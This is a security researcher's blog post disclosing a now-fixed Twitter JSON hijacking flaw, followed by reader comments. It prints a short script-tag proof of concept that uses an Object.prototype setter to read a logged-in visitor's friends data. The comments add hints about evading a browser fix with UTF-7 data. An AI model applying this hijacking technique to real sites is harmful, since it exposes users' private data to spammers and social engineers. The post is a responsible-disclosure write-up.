I know what your friends did last summer

I did report this to Twitter a few weeks ago, but now that Chris Heilmann has let the cat out of the bag I’ll post my repro now. Basically Twitter JSON security is leaking data, the JSON feeds that are publically available shouldn’t be IMO or at least protected using known methods.

So if you use Twitter a web site can know who you are and who your friends are. Spammers could you this data to automate targeted spamming attacks or maybe automated social engineering, you’re more like to open a email attachment off your friends right?

The attack works by including the JSON data using a script tag on any web site, using setters you can get the data of the JSON feed in every browser except IE (in my testing).

<script>
Object.prototype.__defineSetter__('user',function(obj){for(var i in obj) {alert(i + '=' + obj[i]);} });
</script>
<script defer="defer" src=https://twitter.com/statuses/friends_timeline/>
</script>

Originally I thought it was a bug in Firefox, that’s why I’ve used Object.prototype and not simply Object but I found a post by Joe Walker which uses a far better technique to grab all the data.

Here is the proof of concept to prove I do know what your friends did last summer:-
twitter json hack

12 Responses to “I know what your friends did last summer”

  1. thornmaker writes:

    how about document.write() instead of alert() for your PoC? 🙂

  2. Gareth Heyes writes:

    LOL nah I like annoying people 🙂 plus I can’t be bothered changing it now

  3. Gareth Heyes writes:

    * Note You need to be logged into twitter using https in order for the POC to work correct

  4. Gareth Heyes writes:

    Twitter has now fixed the problem whoo hoo

  5. Giorgio Maone writes:

    Get NoScript 1.8.8.95 from http://noscript.net/getit#devel 🙂

    http://hackademix.net/2009/01/13/you-dont-know-what-my-twitter-leaks/

    http://hackademix.net/2009/01/13/twitter-json-hijacking-updates/

  6. Pete writes:

    Hi Gareth
    I found your name and information on the Security Planet website. Can you help me, or do you know someone who can help me, to crack a gmail password?
    Thanks
    Pete

  7. Gareth Heyes writes:

    @Pete

    I think you misunderstood what I actually do. I’m a security researcher.

  8. Frank Polenose writes:

    I had to have a chuckle at Petes comment! Cheered me right up!

  9. carstein writes:

    It seems that doesn’t work in ff 3.5 because setters are ignored when initializing object. Any ideas how to evade that?

  10. Gareth Heyes writes:

    @carstein

    UTF-7 should work until they fix it

  11. carstein writes:

    @Gareth:
    I don’t think I follow you. UTF-7 where?

    The problem is, that in FF3 you can define Setter for an Object.prototype which gets invoked when you recived JSON object (as a JS, so Object() is being initialized). However, due to tweaks in FF3.5 setters are only called when the value is begin set to an existing object, but not during initialization (so it spoils all the joy of JSON hijack).

  12. Gareth Heyes writes:

    @carstein

    I do follow honest but if you used poisoned UTF-7 data with a json request then you can get most of the data by manipulating the javascript. See my CSP hack.

    http://www.thespanner.co.uk/2009/11/23/bypassing-csp-for-fun-no-profit/